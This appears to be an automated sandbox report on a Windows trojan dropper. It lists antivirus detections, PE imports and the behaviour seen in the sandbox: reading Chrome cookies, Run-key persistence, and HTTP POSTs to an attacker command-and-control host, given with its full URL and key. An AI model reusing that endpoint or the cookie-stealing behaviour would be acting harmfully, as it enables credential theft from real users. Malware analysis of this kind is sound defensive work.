7.0
高危

5fac6cd31ff0f16528342db837798bb0767bd8a6747177492df2bf74d4c51dab

56ca13666918d6227702bada9419fcb4.exe

分析耗时

69s

最近分析

文件大小

558.0KB
静态报毒 动态报毒 AI SCORE=83 ATTRIBUTE BITMINRP BSCOPE CLASSIC CONFIDENCE DOWNLOADER33 DROPPERX ELDORADO EPTZ FACEBOOK FAMVT GENCIRC GENERICRXKJ GENETIC GJVE HIGH CONFIDENCE HIGHCONFIDENCE HJBCCU INFOSPY IUW@AA6UJZPJ JOHNNIE KCLOUD KVM003 MALICIOUS PE R06EC0DIK20 SCORE STATIC AI SUSGEN UNSAFE URSU WACATAC XRNQI ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee GenericRXKJ-CY!56CA13666918 20201229 6.0.6.653
Alibaba Trojan:Win32/DropperX.0c93e499 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:DropperX-gen [Drp] 20201228 21.1.5827.0
Tencent Malware.Win32.Gencirc.115a925f 20201229 1.0.0.1
Kingsoft Win32.Heur.KVM003.a.(kcloud) 20201229 2017.9.26.565
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
静态指标
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header suspicious_request POST http://hfuie32.2ihsfa.com/api/?sid=112110&key=569bc5ec4b9e1ab1b3cc5d4230872188
Performs some HTTP requests (3 个事件)
request GET http://ip-api.com/json/
request GET http://hfuie32.2ihsfa.com/api/fbtime
request POST http://hfuie32.2ihsfa.com/api/?sid=112110&key=569bc5ec4b9e1ab1b3cc5d4230872188
Sends data using the HTTP POST Method (1 个事件)
request POST http://hfuie32.2ihsfa.com/api/?sid=112110&key=569bc5ec4b9e1ab1b3cc5d4230872188
Steals private information from local Internet browsers (3 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies
Foreign language identified in PE resource (1 个事件)
name PPP language LANG_CHINESE offset 0x0005c0b0 filetype PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0002e000
Looks up the external IP address (1 个事件)
domain ip-api.com
Creates executable files on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\jfiag_gg.exe
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\jfiag_gg.exe
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619426988.776812
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.838221562094594 section {'size_of_data': '0x0002e400', 'virtual_address': '0x0005c000', 'entropy': 7.838221562094594, 'name': '.rsrc', 'virtual_size': '0x0002e230'} description A section with a high entropy has been found
entropy 0.33213644524236985 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Installs itself for autorun at Windows startup (1 个事件)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq reg_value C:\Users\ADMINI~1.OSK\AppData\Local\Temp\kissq.exe
File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 个事件)
Bkav W32.FamVT.BitminRP.Worm
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.Agent.EPTZ
FireEye Generic.mg.56ca13666918d622
McAfee GenericRXKJ-CY!56CA13666918
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 004cb1d21 )
Alibaba Trojan:Win32/DropperX.0c93e499
K7GW Trojan ( 004cb1d21 )
Cybereason malicious.66918d
Arcabit Trojan.Agent.EPTZ
Cyren W32/Ursu.EB.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Kaspersky HEUR:Trojan-Dropper.Win32.Agent.vho
BitDefender Trojan.Agent.EPTZ
NANO-Antivirus Trojan.Win32.Dwn.hjbccu
Paloalto generic.ml
AegisLab Trojan.Multi.Generic.4!c
Tencent Malware.Win32.Gencirc.115a925f
Ad-Aware Trojan.Agent.EPTZ
Emsisoft Trojan.Agent.EPTZ (B)
DrWeb Trojan.DownLoader33.35834
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0DIK20
McAfee-GW-Edition BehavesLike.Win32.Generic.hc
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Jiangmin TrojanDropper.Agent.gjve
Webroot W32.Trojan.Gen
Avira TR/Agent.xrnqi
MAX malware (ai score=83)
Antiy-AVL Trojan/Win32.Wacatac
Kingsoft Win32.Heur.KVM003.a.(kcloud)
Gridinsoft Adware.Win32.Downloader.vb
Microsoft Trojan:Win32/Johnnie.A!MTB
ZoneAlarm HEUR:Trojan-Dropper.Win32.Agent.vho
GData Win32.Trojan-Dropper.Johnnie.B
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Agent.C4090193
VBA32 BScope.Trojan.Infospy
ALYac Trojan.Agent.EPTZ
Malwarebytes Trojan.Downloader
ESET-NOD32 a variant of Win32/Agent.UAW
TrendMicro-HouseCall TROJ_GEN.R06EC0DIK20
Rising Stealer.Facebook!1.CC5B (CLASSIC)
Ikarus Trojan.Win32.Agent
MaxSecure Trojan.Malware.7164915.susgen
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-04-24 13:42:12

Imports

Library KERNEL32.dll:
0x444028 FormatMessageW
0x44402c LocalFree
0x444030 GetModuleFileNameA
0x444034 lstrlenW
0x444038 CreateThread
0x44403c GetModuleHandleW
0x444040 WriteConsoleW
0x444044 WinExec
0x444048 FindResourceW
0x44404c LoadResource
0x444050 LockResource
0x444054 GetLastError
0x444058 GetTempPathA
0x44405c Sleep
0x444060 CopyFileA
0x444064 SizeofResource
0x444068 HeapSize
0x44406c CreateFileW
0x444070 SetStdHandle
0x444074 GetProcessHeap
0x444080 GetCommandLineW
0x444084 GetCommandLineA
0x444088 GetOEMCP
0x44408c GetACP
0x444090 IsValidCodePage
0x444094 FindNextFileW
0x444098 FindFirstFileExW
0x44409c FindClose
0x4440a0 HeapReAlloc
0x4440a4 ReadConsoleW
0x4440a8 ReadFile
0x4440ac EnumSystemLocalesW
0x4440b0 GetUserDefaultLCID
0x4440b4 WideCharToMultiByte
0x4440b8 MultiByteToWideChar
0x4440bc GetStringTypeW
0x4440cc SetLastError
0x4440d4 CreateEventW
0x4440d8 SwitchToThread
0x4440dc TlsAlloc
0x4440e0 TlsGetValue
0x4440e4 TlsSetValue
0x4440e8 TlsFree
0x4440f0 GetProcAddress
0x4440f4 EncodePointer
0x4440f8 DecodePointer
0x4440fc GetCPInfo
0x444100 CompareStringW
0x444104 LCMapStringW
0x444108 GetLocaleInfoW
0x44410c CloseHandle
0x444110 SetEvent
0x444114 ResetEvent
0x444124 GetCurrentProcess
0x444128 TerminateProcess
0x444130 IsDebuggerPresent
0x444134 GetStartupInfoW
0x44413c GetCurrentProcessId
0x444140 GetCurrentThreadId
0x444144 InitializeSListHead
0x444148 RtlUnwind
0x44414c RaiseException
0x444150 FreeLibrary
0x444154 LoadLibraryExW
0x444158 ExitProcess
0x44415c GetModuleHandleExW
0x444160 GetModuleFileNameW
0x444164 GetStdHandle
0x444168 WriteFile
0x44416c GetFileSizeEx
0x444170 SetFilePointerEx
0x444174 GetFileType
0x444178 FlushFileBuffers
0x44417c GetConsoleCP
0x444180 GetConsoleMode
0x444184 HeapFree
0x444188 HeapAlloc
0x44418c IsValidLocale
0x444190 SetEndOfFile
Library ADVAPI32.dll:
0x444000 RegSetValueExW
0x444004 RegOpenKeyExW
0x444008 RegCreateKeyW
0x44400c RegCloseKey
0x444014 RegSetValueExA
0x444018 FreeSid
0x444020 RegOpenKeyExA
Library SHELL32.dll:
0x444198 ShellExecuteExA
Library WINHTTP.dll:
0x4441a4 WinHttpConnect
0x4441ac WinHttpOpen
0x4441b4 WinHttpQueryHeaders
0x4441b8 WinHttpReadData
0x4441bc WinHttpOpenRequest
0x4441c0 WinHttpSetOption
0x4441c4 WinHttpCloseHandle
0x4441d4 WinHttpSendRequest

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49183 207.246.80.14 hfuie32.2ihsfa.com 80
192.168.56.101 49177 208.95.112.1 ip-api.com 80
192.168.56.101 49180 31.13.82.52 www.facebook.com 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://hfuie32.2ihsfa.com/api/?sid=112110&key=569bc5ec4b9e1ab1b3cc5d4230872188
POST /api/?sid=112110&key=569bc5ec4b9e1ab1b3cc5d4230872188 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Content-Length: 265
Host: hfuie32.2ihsfa.com

http://ip-api.com/json/
GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
viewport-width: 1920
Host: ip-api.com

http://hfuie32.2ihsfa.com/api/fbtime
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Host: hfuie32.2ihsfa.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.